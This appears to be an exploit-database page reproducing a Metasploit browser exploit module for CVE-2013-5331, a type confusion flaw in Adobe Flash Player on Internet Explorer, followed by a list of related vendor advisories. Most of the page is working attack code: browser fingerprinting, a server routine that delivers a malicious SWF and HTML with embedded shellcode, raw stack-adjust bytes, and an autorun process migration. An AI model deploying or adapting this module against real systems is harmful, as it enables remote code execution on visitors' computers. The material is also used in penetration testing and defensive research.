Lucene search
Metasploit1337DAY-ID-22190HistoryApr 29, 2014 - 12:00 a.m.
Adobe Flash Player Type Confusion Remote Code Execution Exploit
2014-04-2900:00:00
metasploit
0day.today
24
0.967 High
EPSS
Percentile
99.6%
This Metasploit module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This Metasploit module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Type Confusion Remote Code Execution",
'Description' => %q{
This module exploits a type confusion vulnerability found in the ActiveX
component of Adobe Flash Player. This vulnerability was found exploited
in the wild in November 2013. This module has been tested successfully
on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170
over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'bannedit', # Exploit in the wild discoverer, analysis and reporting
'juan vazquez' # msf module
],
'References' =>
[
[ 'CVE', '2013-5331' ],
[ 'OSVDB', '100774'],
[ 'BID', '64199'],
[ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ],
[ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ]
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true,
'PrependEncoder' => stack_adjust
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Dec 10 2013",
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def stack_adjust
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
adjust
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
print_status("showme the money")
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
flash_payload = ""
get_payload(cli,target_info).unpack("V*").each do |i|
flash_payload << "0x#{i.to_s(16)},"
end
flash_payload.gsub!(/,$/, "")
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
# 0day.today [2018-03-19] #Related
packetstorm
packetstorm
Adobe Flash Player Type Confusion Remote Code Execution
2014-04-29 00:00:00
checkpoint_advisories
checkpoint_advisories
ubuntucve
ubuntucve
CVE-2013-5331
2013-12-11 00:00:00
hackerone
hackerone
seebug
seebug
Adobe Flash PlayerεAIRη±»εζ··ζ·θΏη¨δ»£η ζ§θ‘ζΌζ΄(CVE-2013-5331)
2013-12-11 00:00:00
Adobe Flash Player Type Confusion Remote Code Execution
2014-07-01 00:00:00
cve
cve
CVE-2013-5331
2013-12-11 15:55:00
prion
prion
Type confusion
2013-12-11 15:55:00
metasploit
metasploit
Adobe Flash Player Type Confusion Remote Code Execution
2014-04-27 15:40:46
cvelist
cvelist
CVE-2013-5331
2013-12-11 15:00:00
exploitdb
exploitdb
Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)
2014-04-29 00:00:00
nessus
nessus
openvas
openvas
Adobe AIR Multiple Vulnerabilities-01 (Dec 2013) - Mac OS X
2013-12-18 00:00:00
Adobe AIR Multiple Vulnerabilities-01 (Dec 2013) - Windows
2013-12-18 00:00:00
Adobe Flash Player Multiple Vulnerabilities-01 (Dec 2013) - Linux
2013-12-18 00:00:00
mageia
mageia
Updated flash-player-plugin package fixes vulnerabilities
2013-12-13 02:24:23
redhat
redhat
(RHSA-2013:1818) Critical: flash-plugin security update
2013-12-11 00:00:00
suse
suse
Security update for flash-player (important)
2013-12-17 00:04:17
threatpost
threatpost
Adobe Updates Security for Flash, Shockwave Players
2013-12-10 15:05:18
gentoo
gentoo
Adobe Flash Player: Multiple vulnerabilities
2014-02-06 00:00:00